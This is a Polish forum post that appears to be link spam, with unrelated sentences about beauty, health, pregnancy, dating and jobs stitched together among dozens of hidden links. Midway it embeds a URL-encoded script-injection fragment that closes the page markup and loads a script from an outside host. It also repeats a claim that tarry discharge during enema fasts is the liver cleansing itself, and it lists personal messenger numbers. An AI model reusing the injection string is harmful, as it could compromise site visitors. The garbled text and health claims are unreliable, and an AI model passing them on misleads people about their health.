Forum Akademii Fani Strona Gwna

także to pęknięcie nogi nie jest żadnym zaskoczeniem .

 
Napisz nowy temat   Odpowiedz do tematu    Forum Akademii Fani Strona Gwna -> Plebiscyty
Autor Wiadomo
Juukla



Doczy: 25 Sty 2014
Posty: 756
Przeczyta: 0 tematw

Ostrzee: 0/5
Skd: Finland

PostWysany: Pi, 11 Kwi 2014 9:43    Temat postu: także to pęknięcie nogi nie jest żadnym zaskoczeniem .

- do raportu!!
[link widoczny dla zalogowanych]
Aha, nie wolno samemu wracac srodkami komunikacji publiczej, trzeba sobie załatwic odwoz samochodem do domu - to taka informacja dla tych, ktorzy nie mają nikogo.
Mika1234 - probowalas moze serii do prostowania wlosow?
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
Jednak moja gruba kocica strasznie się rozleniwiła i łapanie pająków ma w głębokim poważaniu.
tym bardziej, że się nie znam
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

U mnie padało a taraz śliczna tęcza [link widoczny dla zalogowanych] kilka mies smarowałam Eveline i nic, ćwiczyłam i nic, a po bańkach jest ogromna różnica.
moze nie jaskarwy rózowy tak rażak ale wiesz taki fajny napewnie fajnie wygląada ja mam kurtke rózowa i spodnie raz sie tak ubrałam i wszysycy na mnie patrzyli ale .. ale kurka musi isc! ja pracuje juz 2 tydzien raczej nie chce odejsc z tamtad ale moze przyjde na kolorek moje gg to 1823496 5 Okupnik W dodatku był na suficie. [link widoczny dla zalogowanych]
Opinii wiele ale od jakiegoś czasu cisza prawie nikt nie pisze na ich temat. Ja na razie odpuściłam sobie tego typu zabiegi i postawiłam na taką pielegnacje [link widoczny dla zalogowanych] Czasami to kwestia zle dobranego kremu pielęgnacyjnego. ale teraz martwi mnie co innego... Stosowałem maść Triderm (z przepisu lekarza) i jeszcze jakiś płyn z antybiotykiem, robiony w aptece według przepisu dermatologa. w końcu zebrało sie sporo przedmiotów, które łamią, tę bvarwe Ale potem to powtarzam. bo:
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
pa
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

odpisac na uwagi OWM mogłabyś bo to podobno też ważne,Napisz tam swoją wersje i już.powodzenia
[link widoczny dla zalogowanych]
up
[link widoczny dla zalogowanych]
Ja bym potrzebowała porady na temat odkurzacza duo wodnika z Zelmera.
Ja póki co jestem za granica ale wracam i rodzic bede w Polsce,prawdopodobnie na Zamenhofa.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
Co u Was Kochani?
[link widoczny dla zalogowanych]
a jakaś stronka z tymi bucikami ..:> może znasz?..
[link widoczny dla zalogowanych]

ja lubie Syossa miesci sie jeszcze w moim przedzale cenowym [link widoczny dla zalogowanych] jedziecie do Polski?
Kość mi się złamała zaraz po zdjęciu aparatu. Ztego co pamietam tam na szybie powinny byc jakies ogloszenia i informacje wiec badz czujna. Po pierwszych zakupach jesteś już mniej więcej zorientowana, co i w jakim rozmiarze Ci pasuje, przy następnych bierzesz dodatkowo pod uwagę opinie o danym modelu, jakie dziewczyny zamieszczają na Lobby czy na Balkonetce i ilość zamawianych rozmiarów maleje, prawdopodobieństwo zamówienia ideału rośnie. a potem rozpoczniesz nowy etap życia.. [link widoczny dla zalogowanych] F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%6 9%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74 [link widoczny dla zalogowanych]
Dancewicz ma okropne piersi!!!! paaao- a mozesz mi podac mi meila bo mam pare pytan.... na opakowaniu jest napisane żeby nie stosować tego w połączeniu z innymi rzeczami niż np durex play, abstrach*jąc od marketingu, czy to nie jest tak, że ochrona, czy choćby wytrzymałość prezerwatywy może być zmniejszona przez odpowiednie składniki leku? To jest chyba jej nazwisko panienskie bo z tego co wiem to jej mąż inaczej sie nazywa! Poza tym,że czuję to okropne coś w podbrzuszu Pierwszy raz mam taki problem i jestem troche przestarszona tym bardziej po tym jak przeczytałam o Waszych historiach. Nienawidze pajkow panicznie sie ich boje, wrzeszce jak opentana jak zobacze w poblizu. w sumie jak po nim i tak nie chudne to po cholere
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Hej dziewczyny, ja mam 30 lat i jestem ze Świdnicy.
[link widoczny dla zalogowanych]
ale to mam nadzieje wiesz , a jesli nie do sie dowiedzialas. *uzupelnienie 40zl
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
(mam nadzieje)
[link widoczny dla zalogowanych]
po przeczytaniu adresu lub podanego numeru stacjonarnego można łatwo sie domyślić że agencja mieści się w Warszawie Ne szukam osób tylko z Warszawy , wielu ludzi szuka pracy z z amieszkaniem
[link widoczny dla zalogowanych]
Będę miała dzisiaj gości.

Ja Wrocław, a Wy? [link widoczny dla zalogowanych] czesc dziewczynki moze jakies fajne babki z CZESTOCHOWY I OKOLOC trafia na ta stronke piszcie gg 11586804 jestem 30 mezatka, ale maz pracuje za granica a ja mam sporo wolnego czasu, lubie babskie ploteczki przy kawce, wyjscia do pabu , chodzic po sklepach, wspolnie z kolezankami cos upichcic i kocham rozowe wino uwielbiam moj maly ogrodek i prace w nim, lubie las i grzybki ..., a nie lubie gdy mam na to wszystko ochote a tu nie ma z kim dlatedo bardzo chetnie nawiaze nowe znajomosci
Więc chyba to możliwe, chociaż dziwne mi to się wydaje. czy was tez zab dalej boli po tym leczeniu? szukam fryzjera, ale nie chce isc z ulicy mam uraz byłam raz i zostałam ścięta krócej o jakieś 20 cm niż sobie tego życzyłam. mam dosc juz takich gadek, bo to moze czlowieka naprawde zmeczyc, tymbardziej robi sie jakas blokade w glowie. Wczoraj ugotowałam zupkę, a dziś z pośpiechu nie wzięłam jej do pracy. [link widoczny dla zalogowanych]
Odczuwałam zawroty głowy ale i więcej energii niż w pierwszym dniu. wczesniej blizna miala 1,5 a moze nawet i 2 cm szerokosci, a teraz jest na 1mm!!! od kilku dni ta drętwota jest okropna magdanemail-stanz [link widoczny dla zalogowanych] Opowiedziałabym Ci trzy historie--kobieta+Turek; co to za metoda? Taka czarna smolista mazia to sa brudy z watroby,oznacza to,ze watroba zaczela sie oczyszczac u Ciebie.Ja nie mialam tego podczas glodowek z lewatywami ,a jak cos takiego schodzi to jest super Po oczyszczeniu watroby poprawi Ci sie koloryt cery.
[link widoczny dla zalogowanych]
Tylko jeszcze ta wydzielina mi się wydobywa...
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
Serdecznie polecam swoją osobę jako opiekunkę, korepetytora, towarzyszkę ciekawych zabaw.
A spodnie skracam i jakos nic.Gorzej z plaszcami i zakietami, ale tez lumpex ratuje, pare genialnych rzeczy kupilam.
[link widoczny dla zalogowanych]
z dzidzią na USG wszystko O.K.

Jakiś pół godz.
[link widoczny dla zalogowanych]
, nie mam co się tłumaczyć - byłam na imprezie i uległam sernikowi na zimno , a potem to już poszło .
Jeśli ktoś zna jakiś dobry sposób na ich odstraszanie proszę o informację, będę bardzo wdzięczna.
Wizytę u lekarza pooperacyjną mam wyznaczoną na 14 stycznia 2010 r.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
Ok idę spać, bo północ wybiła.
Drugi dzień:

I ew. [link widoczny dla zalogowanych] Troche to dziwne ,ze zrzucenie 3 kg spowodowalo to,ze wisza piersi ,ktore wczesniej byly pelne .
ja próbuję naturalni Ja już teraz zastanawiam się, jak przejść od białkowo-tłuszczówki na zdrowie odżywianie, żeby efekty zostały dłuuuugo... 1 pęczek koperku Pozdrawiam wszystkich Odezwijcie sie! [link widoczny dla zalogowanych]
masakra jakas. Leczyłam się u dermatologa, ale nie przynosi to większych efektów. - ma duże doświadczenie Paznokcia po prostu nie wolno za bardzo obcinać. boje się zaczynac 6 w... Te historie wasz sa SUPER!!!! zero siniaczków i jakiś tam grudek, opuchlizny jak nie było tak nie ma, czego się bałam widząc zdjęcia dziewczyn po zabiegu może to dzięki temu, że preparat był dobry albo poprostu nie mam skłonności do zmian po zabiegu.
i czy boli?
wolę spokojnie z polecenia niż nagle za grube pieniądze ,ale to moja opinia
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
Kilka cytacików dla Was dziewczyny
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]


Post zosta pochwalony 0 razy
Powrt do gry
Zobacz profil autora
Wywietl posty z ostatnich:    Zobacz poprzedni temat : Zobacz nastpny temat  
Napisz nowy temat   Odpowiedz do tematu    Forum Akademii Fani Strona Gwna -> Plebiscyty Wszystkie czasy w strefie EET (Europa)
Strona 1 z 1

 
Skocz do:  
Nie moesz pisa nowych tematw
Nie moesz odpowiada w tematach
Nie moesz zmienia swoich postw
Nie moesz usuwa swoich postw
Nie moesz gosowa w ankietach

fora.pl - za wasne forum dyskusyjne za darmo
Regulamin